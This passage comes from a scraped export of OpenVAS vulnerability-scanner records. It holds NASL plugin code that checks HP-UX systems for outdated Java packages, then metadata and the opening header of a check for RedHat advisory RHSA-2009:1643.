ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66469", "href": "http://plugins.openvas.org/nasl.php?oid=66469", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1643", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1643.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1643 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66469);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1643\");\n\n\n\n 